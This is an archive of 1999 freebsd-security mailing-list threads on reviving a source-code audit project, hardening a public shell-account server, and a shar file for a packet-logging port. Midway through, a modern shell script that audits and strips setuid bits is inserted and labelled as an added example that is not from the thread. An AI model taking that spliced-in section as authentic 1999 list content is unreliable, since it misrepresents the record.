From: "Dan Langille"
Organization: The FreeBSD Diary
To: "Ilmar S. Habibulin"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: auditors
Date: Tue, 1 Jun 1999 08:37:28 +1200
Reply-To: junkmale@xtra.co.nz
Message-Id: <19990531204003.LQOG7869945.mta1-rme@wocker>

On 1 Jun 99, at 0:14, Ilmar S. Habibulin wrote:

> On Mon, 31 May 1999, Snob Art Genre wrote:
>
> > > And what about posix auditing? Robert Watson made a posix.1e audit
> > > implementation for freebsd. Why not use his work?
> >
> > Different kind of auditing. The first is people vetting code for
> > security flaws, the second is logging of system events.
>
> Oh, I suppose I misunderstood the term "auditing". You were talking about
> source code auditing?

Yes. And a cute extract from the URL given
(http://www.FreeBSD.org/auditors.html):

"Our second step will be this audit, an attempt to methodically go through
every line of source in FreeBSD looking for obvious buffer overflows
(sprintf()/strcpy() vs snprintf()/strncpy() and so on), less obvious
security holes, instances of insufficiently defensive coding, amusing
comment strings to forward to freebsd-chat, whatever we run across."

I, for one, await the amusing comments.
--
Dan Langille - DVL Software Limited
The FreeBSD Diary - http://www.FreeBSDDiary.org/freebsd/
NZ FreeBSD User Group - http://www.nzfug.nz.freebsd.org/
The Racing System - http://www.racingsystem.com/racingsystem.htm

From owner-freebsd-security Mon May 31 15:39:05 1999
Message-ID: <3752E531.54B2845C@tdnet.com.br>
Date: Mon, 31 May 1999 19:38:25 +0000
From: Unknow User
To: security@freebsd.org
Subject: Shell Account system

I have plans to set up a FreeBSD box to act as a shell account!
I know that security on shell account servers NEEDS to be very fine,
right?
Can anybody point me to some URL where I can read security tips on
FreeBSD/UNIX?
Another question: where can I read a good tutorial about opie?

--
"The box said 'Requires Windows 98, NT, Linux or better' so I
installed FreeBSD."

From owner-freebsd-security Mon May 31 17:16:31 1999
Date: Tue, 1 Jun 1999 09:47:24 +0930 (CST)
From: Kris Kennaway
To: Bill Fumerola
Cc: Eivind Eklund, freebsd-security@freebsd.org
Subject: Re: auditors

On Mon, 31 May 1999, Bill Fumerola wrote:

> On Mon, 31 May 1999, Eivind Eklund wrote:
>
> > The auditing project has been dead/sleeping for a *long* while. If it
> > should be revived, the first thing to do would be to merge over the
> > OpenBSD fixes, and then have somebody actually *lead* the auditing
> > project.
>
> I could help merge the userland fixes; however, I am not the one to lead
> this.

Well, I've been doing some work on this lately (merging userland fixes) and
Dan Moschuk has pledged his help as well, but I don't feel qualified to act as
some kind of "project leader" because of my relative UNIX code inexperience
(when I see a patch for a problem I can understand how it fixes it, and
whether it applies to our code, but I don't have enough of a big picture yet
to go looking for problems myself).

Kris

-----
"Never criticize anybody until you have walked a mile in their shoes,
because by that time you will be a mile away and have their shoes."
-- Unknown

From owner-freebsd-security Mon May 31 18:54:02 1999
Message-ID: <002701beabd1$90441c90$7271a1ce@tasam.com>
From: "Joe Gleason"
To: "Unknow User"
References: <3752E531.54B2845C@tdnet.com.br>
Subject: Re: Shell Account system
Date: Mon, 31 May 1999 21:53:28 -0400

Use find to locate all suid programs on the system. Remove suid from any
you don't think you need. Read man pages if unsure. If still unsure,
remove suid anyway.

Edit /etc/inetd.conf. Disable everything you don't know you need. (As
above with suids.)

Go through rc.conf. Disable things you don't need.

If you have a program or service you are installing, try to see if you
can get it to run as non-root.

I usually like this approach of removing things that you don't need to
minimize security risk.

Joe Gleason
Tasam

----- Original Message -----
From: Unknow User
Sent: Monday, May 31, 1999 15:38
Subject: Shell Account system

> I have plans to set up a FreeBSD box to act as a shell account!
> I know that security on shell account servers NEEDS to be very fine,
> right?
> Can anybody point me to some URL where I can read security tips on
> FreeBSD/UNIX?
> Another question: where can I read a good tutorial about opie?
>
> --
> "The box said 'Requires Windows 98, NT, Linux or better' so I
> installed FreeBSD."

From owner-freebsd-security Mon May 31 19:12:15 1999
Date: Tue, 1 Jun 1999 11:42:59 +0930 (CST)
From: Kris Kennaway
To: Joe Gleason
Cc: Unknow User, security@freebsd.org
Subject: Re: Shell Account system
In-Reply-To: <002701beabd1$90441c90$7271a1ce@tasam.com>

On Mon, 31 May 1999, Joe Gleason wrote:

[Snip]

Good advice, but running a shell account for people who you don't really trust
is still not a wise move for the inexperienced, and not something you can
easily document in a webpage. UNIX security is a way of life - there are any
number of things which the unwary can trip over which could potentially
compromise your machine.

If it's for a small group of users who you trust fairly well, you
probably should be okay, though.

Kris

> ----- Original Message -----
> From: Unknow User
> Sent: Monday, May 31, 1999 15:38
> Subject: Shell Account system
>
> > I have plans to set up a FreeBSD box to act as a shell account!
> > I know that security on shell account servers NEEDS to be very fine,
> > right?
> > Can anybody point me to some URL where I can read security tips on
> > FreeBSD/UNIX?
> > Another question: where can I read a good tutorial about opie?
> >
> > --
> > "The box said 'Requires Windows 98, NT, Linux or better' so I
> > installed FreeBSD."

-----
"Never criticize anybody until you have walked a mile in their shoes,
because by that time you will be a mile away and have their shoes."
-- Unknown

From owner-freebsd-security Mon May 31 19:18:04 1999
Message-ID: <37533B3F.280BAC9A@tdnet.com.br.>
Date: Mon, 31 May 1999 22:45:35 -0300
From: Unknow User
To: security@freebsd.org
Subject: shell account server

Dear gentlemen, I am supposed to set up a shell account server. Of course,
this kind of server is very exposed to being hacked, so the system:
(The company is beginning, so 100% client satisfaction is highly
desirable)

1) once set up, never reboot it!
2) very fast service, I have to build a fine kernel, compile all
necessary software including only necessary options!
3) if the system is hacked I will probably be fired
4) No data can be lost.

There are some other points, but for now, this is what's necessary!

I began with FreeBSD 2.2.7-Release, I bought the Great Book The Complete
FreeBSD, I have a good (not enough) amount of knowledge about setting
up FreeBSD machines. But now I have a great opportunity, and I don't want
to perform a bad job!

My doubts are:

1 - Which FreeBSD version should I use? 2.2.8-Stable, 3.1-Stable or
3.2-Stable?
2 - Is there any URL that points me to all the security bugs I have to fix
on the chosen version?
3 - Am I going in the right direction choosing FreeBSD?
4 - I have the book The Complete FreeBSD (I bought it with 2.2.7); is it
worth buying an updated version, if you suggest me a 3.x FreeBSD version?
5 - Be as sincere as possible, I would like to perform excellently!

Thank you for your time and cooperation!

PS: I am sorry if the questions are stupid, but I have no one to ask for
help!!
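Joe Gleason's checklist earlier in this thread (find the setuid programs, strip the bit from the ones you do not need, then prune inetd.conf) can be scripted. The following is an added example, not code from anyone in the thread; the function names are its own, and it runs against a constructed sandbox tree and a constructed inetd.conf rather than the live system.

```sh
#!/bin/sh
# Added example (not from the thread): scripts the setuid and inetd.conf
# review Joe Gleason describes. Function names and sample files are the
# example's own; it works on a constructed sandbox, not on the live system.

# Print every setuid or setgid regular file under directory $1, sorted.
# On a real box you would run it against / and read the list carefully.
list_setuid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print | sort
}

# Print the service names that are enabled (not commented out) in the
# inetd.conf given as $1, in file order.
enabled_inetd_services() {
    awk '!/^[[:space:]]*#/ && NF { print $1 }' "$1"
}

# Remove the setuid/setgid bits from every file under $1 whose basename is
# not listed (one per line) in the keep-list file $2, printing each path
# changed. Programs such as passwd and su genuinely need the bit; keep them.
strip_setuid_except() {
    list_setuid "$1" | while IFS= read -r path; do
        if ! grep -qx "$(basename "$path")" "$2"; then
            chmod u-s,g-s "$path" && echo "$path"
        fi
    done
}

# Build a constructed sandbox: empty files carry the mode bits, and the
# inetd.conf uses FreeBSD 2.2/3.x syntax with two services commented out.
make_sandbox() {
    dir=$(mktemp -d)
    mkdir -p "$dir/usr/bin" "$dir/etc"
    for f in passwd su ping crontab vi; do : > "$dir/usr/bin/$f"; done
    chmod 4555 "$dir/usr/bin/passwd" "$dir/usr/bin/su" \
               "$dir/usr/bin/ping" "$dir/usr/bin/crontab"
    chmod 555 "$dir/usr/bin/vi"
    cat > "$dir/etc/inetd.conf" <<'EOF'
# constructed sample inetd.conf
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
#shell   stream  tcp     nowait  root    /usr/libexec/rshd       rshd
#login   stream  tcp     nowait  root    /usr/libexec/rlogind    rlogind
finger  stream  tcp     nowait  nobody  /usr/libexec/fingerd    fingerd -s
EOF
    echo "$dir"
}

# Demo run on the sandbox.
sb=$(make_sandbox)
echo "setuid/setgid programs under $sb:"
list_setuid "$sb"
echo "enabled inetd services:"
enabled_inetd_services "$sb/etc/inetd.conf"
rm -rf "$sb"
```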
From owner-freebsd-security Mon May 31 19:18:03 1999
Message-ID: <37534264.6D29110A@tdnet.com.br.>
Date: Mon, 31 May 1999 23:16:04 -0300
From: Unknow User
To: Kris Kennaway, security@freebsd.org
Subject: Re: Shell Account system

Yeah, thanks, but the system is for anyone able to pay, so, you can say I
trust nobody.

Kris Kennaway wrote:
>
> On Mon, 31 May 1999, Joe Gleason wrote:
>
> [Snip]
>
> Good advice, but running a shell account for people who you don't really trust
> is still not a wise move for the inexperienced, and not something you can
> easily document in a webpage. UNIX security is a way of life - there are any
> number of things which the unwary can trip over which could potentially
> compromise your machine.
>
> If it's for a small group of users who you trust fairly well, you
> probably should be okay, though.

From owner-freebsd-security Mon May 31 19:22:33 1999
Date: Mon, 31 May 1999 22:22:23 -0400 (EDT)
From: Bill Fumerola
To: Kris Kennaway
Cc: Eivind Eklund, freebsd-security@freebsd.org
Subject: Re: auditors

On Tue, 1 Jun 1999, Kris Kennaway wrote:

> Well, I've been doing some work on this lately (merging userland fixes) and
> Dan Moschuk has pledged his help as well, but I don't feel qualified to act as
> some kind of "project leader" because of my relative UNIX code inexperience
> (when I see a patch for a problem I can understand how it fixes it, and
> whether it applies to our code, but I don't have enough of a big picture yet
> to go looking for problems myself).

My exact feelings. Perhaps it's time for me to go walking through
{Open,Net}BSD's cvs tree and start hunting security fixes.

I love the BSD license.

- bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp -
- ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org -

From owner-freebsd-security Mon May 31 19:24:14 1999
In-Reply-To: <37534264.6D29110A@tdnet.com.br.>
Date: Mon, 31 May 1999 22:24:04 -0500
To: freebsd-security@freebsd.org
From: "Timothy R. Platt"
Subject: Re: Shell Account system

Install tripwire, it's in the ports. Better install a traffic logger, or
better yet ipfw. You'll need them to log and report all the smurfs,
fraggles, and synks you're going to get.

Tim

>Yeah, thanks, but the system is for anyone able to pay, so, you can say
>I trust nobody.
>
>Kris Kennaway wrote:
>>
>> On Mon, 31 May 1999, Joe Gleason wrote:
>>
>> [Snip]
>>
>> Good advice, but running a shell account for people who you don't really
>> trust is still not a wise move for the inexperienced, and not something
>> you can easily document in a webpage. UNIX security is a way of life -
>> there are any number of things which the unwary can trip over which could
>> potentially compromise your machine.
>>
>> If it's for a small group of users who you trust fairly well, you
>> probably should be okay, though.

From owner-freebsd-security Mon May 31 19:51:35 1999
Date: Tue, 1 Jun 1999 12:22:30 +0930 (CST)
From: Kris Kennaway
To: Unknow User
Cc: security@freebsd.org
Subject: Re: shell account server
In-Reply-To: <37533B3F.280BAC9A@tdnet.com.br.>

On Mon, 31 May 1999, Unknow User wrote:

> (The company is beginning, so 100% client satisfaction is highly
> desirable)
>
> 1) once set up, never reboot it!
> 2) very fast service, I have to build a fine kernel, compile all
> necessary software including only necessary options!
> 3) if the system is hacked I will probably be fired
> 4) No data can be lost.
>
> There are some other points, but for now, this is what's necessary!
>
> I began with FreeBSD 2.2.7-Release, I bought the Great Book The Complete
> FreeBSD, I have a good (not enough) amount of knowledge about setting
> up FreeBSD machines.

If you're really that inexperienced, I seriously doubt you'll be able to do
a perfect job first up, no matter how much advice you get (no-one could).
My advice is to pay a consultant to set the machine up for you, possibly
even hire a good UNIX admin to work for your company. Starting an ISP is
not something you can do without experience and understanding - it's a
major undertaking and, as you noted, if you screw up it will cost you.

Kris

-----
"Never criticize anybody until you have walked a mile in their shoes,
because by that time you will be a mile away and have their shoes."
-- Unknown

From owner-freebsd-security Mon May 31 21:12:54 1999
From: Warren Toomey
Message-Id: <199906010412.OAA48498@henry.cs.adfa.edu.au>
Subject: Pkt loggers: the port
To: security@freebsd.org
Date: Tue, 1 Jun 1999 14:12:48 +1000 (EST)
Reply-To: wkt@cs.adfa.edu.au

All,
Several people sent in suggestions and improvements for my
UDP and TCP packet logging software. I've taken onboard those ideas,
and I've just created a FreeBSD port for the new software. Before
I submit the final port, would anybody care to try it out and let me
know if I've made any dumb mistakes!

The port (as a shar file) is below.

Thanks,
Warren

# This is a shell archive.  Save it in a file, remove anything before
# this line, and then unpack it by entering "sh file".  Note, it may
# create directories; files and directories will be owned by you and
# have default permissions.
#
# This archive contains:
#
#	pktsuckers1_2/Makefile
#	pktsuckers1_2/pkg/COMMENT
#	pktsuckers1_2/pkg/DESCR
#	pktsuckers1_2/pkg/PLIST
#	pktsuckers1_2/pkg/md5
#
# Create the directories the files below are written into.
mkdir -p pktsuckers1_2/pkg > /dev/null 2>&1
echo x - pktsuckers1_2/Makefile
sed 's/^X//' >pktsuckers1_2/Makefile << 'END-of-pktsuckers1_2/Makefile'
XDISTNAME=	pktsuckers1_2
XCATEGORIES=	security
XMASTER_SITES=	ftp://minnie.cs.adfa.edu.au/pub/NetSecurity/
XPREFIX=	/usr/local
X
XMAINTAINER=	wkt@cs.adfa.edu.au
X
X.include <bsd.port.mk>
END-of-pktsuckers1_2/Makefile
echo x - pktsuckers1_2/pkg/COMMENT
sed 's/^X//' >pktsuckers1_2/pkg/COMMENT << 'END-of-pktsuckers1_2/pkg/COMMENT'
XLog contents of unwanted UDP packets and TCP connections
END-of-pktsuckers1_2/pkg/COMMENT
echo x - pktsuckers1_2/pkg/DESCR
sed 's/^X//' >pktsuckers1_2/pkg/DESCR << 'END-of-pktsuckers1_2/pkg/DESCR'
XThe two programs tcpsuck and udpsuck run out of the Inetd daemon on
Xunused ports. They log the contents of packets or connections to these
Xports.
XThis allows you to read the contents of the network strobe
Xattacks on your machine. It also slows the strobes down, as they think
Xyou're actually running a service on several ports when you aren't.
X
XWarren Toomey, wkt@cs.adfa.edu.au
END-of-pktsuckers1_2/pkg/DESCR
echo x - pktsuckers1_2/pkg/PLIST
sed 's/^X//' >pktsuckers1_2/pkg/PLIST << 'END-of-pktsuckers1_2/pkg/PLIST'
Xlibexec/tcpsuck
Xlibexec/udpsuck
END-of-pktsuckers1_2/pkg/PLIST
echo x - pktsuckers1_2/pkg/md5
sed 's/^X//' >pktsuckers1_2/pkg/md5 << 'END-of-pktsuckers1_2/pkg/md5'
XMD5 (pktsuckers1_2.tar.gz) = c3fe342b3afe8107854787fdf2631e35
END-of-pktsuckers1_2/pkg/md5
exit

From owner-freebsd-security Mon May 31 22:12:58 1999
From: Warren Toomey
Message-Id: <199906010512.PAA07537@henry.cs.adfa.edu.au>
Subject: Re: Pkt loggers: the port
In-Reply-To: <199906010412.OAA48498@henry.cs.adfa.edu.au> from Warren Toomey at "Jun 1, 1999 2:12:48 pm"
To: wkt@cs.adfa.edu.au
Cc: security@FreeBSD.ORG
Date: Tue, 1 Jun 1999 15:12:51 +1000 (EST)
Reply-To: wkt@cs.adfa.edu.au

In article by Warren Toomey:
> All,
> Several people sent in suggestions and improvements for my
> UDP and TCP packet logging software. I've taken onboard those ideas,
> and I've just created a FreeBSD port for the new software. Before
> I submit the final port, would anybody care to try it out and let me
> know if I've made any dumb mistakes!

I've had one reply with good suggestions, and have updated the original
source, so the md5 checksum no longer matches.

Thanks all!

Warren

From owner-freebsd-security Mon May 31 22:19:12 1999
Date: Tue, 1 Jun 1999 16:08:08 +0000 (GMT)
From: 0x1c
To: Bill Fumerola
Cc: Kris Kennaway, Eivind Eklund, freebsd-security@FreeBSD.ORG
Subject: Re: auditors

On Mon, 31 May 1999, Bill Fumerola wrote:

> My exact feelings. Perhaps it's time for me to go walking through
> {Open,Net}BSD's cvs tree and start hunting security fixes.

Well, fixes can be submitted, but it's no use unless they are implemented.
A large number of OpenBSD patches/fixes implement non-standard behaviour,
which often appears to be frowned upon by committers. At minimum these
should be considered if an option is given to revert to the historical
behaviour.

Nick

--
Therefore those skilled at the unorthodox
are as infinite as heaven and earth,
inexhaustible as the great rivers.
-- Sun Tzu, The Art of War

From owner-freebsd-security Mon May 31 22:56:00 1999
From: Sheldon Hearn
To: wkt@cs.adfa.edu.au
Cc: security@FreeBSD.ORG
Subject: Re: Pkt loggers: the port
In-reply-to: Your message of "Tue, 01 Jun 1999 14:12:48 +1000." <199906010412.OAA48498@henry.cs.adfa.edu.au>
Date: Tue, 01 Jun 1999 07:55:39 +0200
Message-ID: <41953.928216539@axl.noc.iafrica.com>

On Tue, 01 Jun 1999 14:12:48 +1000, Warren Toomey wrote:

> # This archive contains:
> #
> #	pktsuckers1_2/Makefile

Hi Warren,

Just because other people have put version numbers in port directory
names doesn't mean you should. It's an evil and much abused exception to
the rule for situations where two (usually incompatible) branches of a
package exist. For your package, it's not necessary. :-)

Ciao,
Sheldon.

From owner-freebsd-security Mon May 31 23:13:39 1999
To: Unknow User
Cc: Kris Kennaway, security@FreeBSD.ORG
Subject: Re: Shell Account system
In-reply-to: Your message of "Mon, 31 May 1999 23:16:04 -0300." <37534264.6D29110A@tdnet.com.br.>
Date: Tue, 01 Jun 1999 08:12:32 +0200
Message-ID: <18869.928217552@critter.freebsd.dk>
From: Poul-Henning Kamp

Look at the jail(2) facility in -current. It severely limits the bad
things people can do, without limiting the good things.

In message <37534264.6D29110A@tdnet.com.br.>, Unknow User writes:
>Yeah, thanks, but the system is for anyone able to pay, so, you can say
>I trust nobody.
>
>Kris Kennaway wrote:
>>
>> On Mon, 31 May 1999, Joe Gleason wrote:
>>
>> [Snip]
>>
>> Good advice, but running a shell account for people who you don't really trust
>> is still not a wise move for the inexperienced, and not something you can
>> easily document in a webpage. UNIX security is a way of life - there are any
>> number of things which the unwary can trip over which could potentially
>> compromise your machine.
>>
>> If it's for a small group of users who you trust fairly well, you
>> probably should be okay, though.

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Tue Jun 1 00:57:35 1999
To: Bill Fumerola
Cc: Eivind Eklund, freebsd-security@FreeBSD.ORG
Subject: Re: auditors
From: Dag-Erling Smorgrav Date: 01 Jun 1999 09:56:57 +0200 In-Reply-To: Bill Fumerola's message of "Mon, 31 May 1999 15:27:34 -0400 (EDT)" Message-ID: Lines: 12 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bill Fumerola writes: > I could help merge the userland fixes, however I am not the one to lead > this. > > Takers? I should think Bruce Evans would be the ideal person to lead such an effort. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 4:32: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from bagira.iit.bme.hu (bagira.iit.bme.hu [152.66.241.5]) by hub.freebsd.org (Postfix) with ESMTP id 2DCF115216 for ; Tue, 1 Jun 1999 04:31:06 -0700 (PDT) (envelope-from mohacsi@bagira.iit.bme.hu) Received: from localhost (mohacsi@localhost) by bagira.iit.bme.hu (8.9.1/8.9.1) with ESMTP id NAA07145; Tue, 1 Jun 1999 13:30:43 +0200 (MET DST) Date: Tue, 1 Jun 1999 13:30:43 +0200 (MET DST) From: Janos Mohacsi To: Dan Langille Cc: "Ilmar S. Habibulin" , freebsd-security@FreeBSD.ORG Subject: Re: auditors In-Reply-To: <19990531204003.LQOG7869945.mta1-rme@wocker> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 1 Jun 1999, Dan Langille wrote: > Date: Tue, 1 Jun 1999 08:37:28 +1200 
> From: Dan Langille > To: Ilmar S. Habibulin > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: auditors > > On 1 Jun 99, at 0:14, Ilmar S. Habibulin wrote: > > > On Mon, 31 May 1999, Snob Art Genre wrote: > > > > > > And what about posix auditing? Robert Watson made a posix.1e audit > > > > implementation for freebsd. Why not use his work? > > > > > > Different kind of auditing. The first is people vetting code for > > > security flaws, the second is logging of system events. > > Oh, I suppose I misunderstood the term "auditing". You were talking about source > > code auditing? > > Yes. And a cute extract from the URL given > (http://www.FreeBSD.org/auditors.html): > > "Our second step will be this audit, an attempt to methodically go through > every line of source in FreeBSD looking for obvious buffer overflows > (sprintf()/strcpy() vs snprintf()/strncpy() and so on), less obvious > security holes, instances of insufficiently defensive coding, amusing > comment strings to forward to freebsd-chat, whatever we run > across." Maybe it is worth making some audits on sprintf/strcpy, but it is less useful for 3rd party programs like packages and ports. I would also recommend including libparanoia as standard. 
Janos Mohacsi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 6:40:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 2E296156B9 for ; Tue, 1 Jun 1999 06:40:21 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id KAA27697; Tue, 1 Jun 1999 10:25:40 -0300 (GMT) Message-Id: <199906011325.KAA27697@ns1.sminter.com.ar> Subject: Re: Shell Account system In-Reply-To: <18869.928217552@critter.freebsd.dk> from Poul-Henning Kamp at "Jun 1, 99 08:12:32 am" To: phk@critter.freebsd.dk (Poul-Henning Kamp) Date: Tue, 1 Jun 1999 10:25:40 -0300 (GMT) Cc: kernel@tdnet.com.br, kkennawa@physics.adelaide.edu.au, security@FreeBSD.ORG 
From: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In an earlier message, Poul-Henning Kamp wrote: > > Look at the jail(2) facility in -current. It severely limits the > bad things people can do, without limiting the good things. [...] Is this the chroot alternative you developed for somebody and were going to merge into the source tree some day? Regards. Fernando P. Schapachnik Network administration VIA Net Works Argentina SA Diagonal Roque Sáenz Peña 971, 4th and 5th floor. 1035 - Capital Federal, Argentina. (54-11) 4323-3333 http://www.via-net-works.net.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 7:10:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (unknown [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 68BAE14CA8; Tue, 1 Jun 1999 07:08:53 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id KAA19516; Tue, 1 Jun 1999 10:08:40 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Tue, 1 Jun 1999 10:08:40 -0400 (EDT) 
From: Bill Fumerola To: 0x1c Cc: Kris Kennaway , Eivind Eklund , freebsd-security@FreeBSD.ORG Subject: Re: auditors In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 1 Jun 1999, 0x1c wrote: > Well, fixes can be submitted, but it's no use unless they are implemented. > A large number of OpenBSD patches/fixes implement non-standard behaviour, > which often appears to be frowned upon by committers. At minimum these > should be considered if an option is given to revert to the historical > behaviour. Definitely. I'm just looking for fixes, not changes. - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 7:37: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 8520714ED1 for ; Tue, 1 Jun 1999 07:36:52 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id QAA20151; Tue, 1 Jun 1999 16:34:29 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Fernando Schapachnik Cc: kernel@tdnet.com.br, kkennawa@physics.adelaide.edu.au, security@FreeBSD.ORG Subject: Re: Shell Account system In-reply-to: Your message of "Tue, 01 Jun 1999 10:25:40 -0300." <199906011325.KAA27697@ns1.sminter.com.ar> Date: Tue, 01 Jun 1999 16:34:29 +0200 Message-ID: <20149.928247669@critter.freebsd.dk> 
From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org yes. In message <199906011325.KAA27697@ns1.sminter.com.ar>, Fernando Schapachnik writes: >In an earlier message, Poul-Henning Kamp wrote: >> >> Look at the jail(2) facility in -current. It severely limits the >> bad things people can do, without limiting the good things. >[...] > >Is this the chroot alternative you developed for somebody and were going to >merge into the source tree some day? > >Regards. > > > >Fernando P. Schapachnik >Network administration >VIA Net Works Argentina SA >Diagonal Roque Sáenz Peña 971, 4th and 5th floor. >1035 - Capital Federal, Argentina. >(54-11) 4323-3333 >http://www.via-net-works.net.ar > -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 8: 0:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from main.websitebuilding.com (main.websitebuilding.com [209.98.117.130]) by hub.freebsd.org (Postfix) with SMTP id 9A8A915745 for ; Tue, 1 Jun 1999 08:00:45 -0700 (PDT) (envelope-from kingjedi@gzero.org) Received: (qmail 42081 invoked from network); 1 Jun 1999 14:53:48 -0000 Received: from gg-151-12.azalea.net (HELO Dasck) (206.52.151.12) by gzero.org with SMTP; 1 Jun 1999 14:53:48 -0000 Message-ID: <009d01beac3f$8633a040$0200a8c0@websitebuilding.com> 
From: "KingJedi" Cc: References: <20149.928247669@critter.freebsd.dk> Subject: Re: Shell Account system Date: Tue, 1 Jun 1999 10:00:41 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.100 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So how would one go about using this? Does anyone have any shells that use this feature? ----- Original Message ----- 
From: Poul-Henning Kamp To: Fernando Schapachnik Cc: ; ; Sent: Tuesday, June 01, 1999 9:34 AM Subject: Re: Shell Account system > > yes. > > In message <199906011325.KAA27697@ns1.sminter.com.ar>, Fernando Schapachnik > writes: > >In an earlier message, Poul-Henning Kamp wrote: > >> > >> Look at the jail(2) facility in -current. It severely limits the > >> bad things people can do, without limiting the good things. > >[...] > > > >Is this the chroot alternative you developed for somebody and were going to > >merge into the source tree some day? > > > >Regards. > > > > > > > >Fernando P. Schapachnik > >Network administration > >VIA Net Works Argentina SA > >Diagonal Roque Sáenz Peña 971, 4th and 5th floor. > >1035 - Capital Federal, Argentina. > >(54-11) 4323-3333 > >http://www.via-net-works.net.ar > > > > -- > Poul-Henning Kamp FreeBSD coreteam member > phk@FreeBSD.ORG "Real hackers run -current on their laptop." > FreeBSD -- It will take a long time before progress goes too far! > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 1 10:47:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from cain.tasam.com (cain.tasam.com [198.232.144.253]) by hub.freebsd.org (Postfix) with ESMTP id 6E53114F82 for ; Tue, 1 Jun 1999 10:47:11 -0700 (PDT) (envelope-from cain@tasam.com) Received: from localhost (localhost [127.0.0.1]) by cain.tasam.com (8.9.3/8.9.1) with SMTP id NAA11014 for ; Tue, 1 Jun 1999 13:42:22 -0400 (EDT) (envelope-from cain@tasam.com) Date: Tue, 1 Jun 1999 13:42:21 -0400 (EDT) 
From: Cain To: freebsd-security@freebsd.org Subject: Re: Shell Account system In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In addition to tripwire, monitor the existence of all SUID programs, when new ones appear make sure you know about it. BTW, ircd is usually SUID, so if a user of yours sets that up it's normal. But then how do you know a hacker just hasn't named his root shell ircd... so monitor the sizes of new SUID programs, oh yes, do not allow modules. Have everything compiled into the kernel that you need On Mon, 31 May 1999, Timothy R. Platt wrote: > Install tripwire, it's in the ports. > > Better install a traffic logger, or better yet ipfw. You'll need them to > log and report all the smurfs, fraggles, and synks you're going to get. > > Tim > > > > > >Yeah, thanks, but the system is for anyone able to pay, so, you can say > >i trust nobody. > > > >Kris Kennaway wrote: > >> > >> On Mon, 31 May 1999, Joe Gleason wrote: > >> > >> [Snip] > >> > >> Good advice, but running a shell account for people who you don't really > >>trust > >> is still not a wise move for the inexperienced, and not something you can > >> easily document in a webpage. UNIX security is a way of life - there are any > >> number of things which the unwary can trip over which could 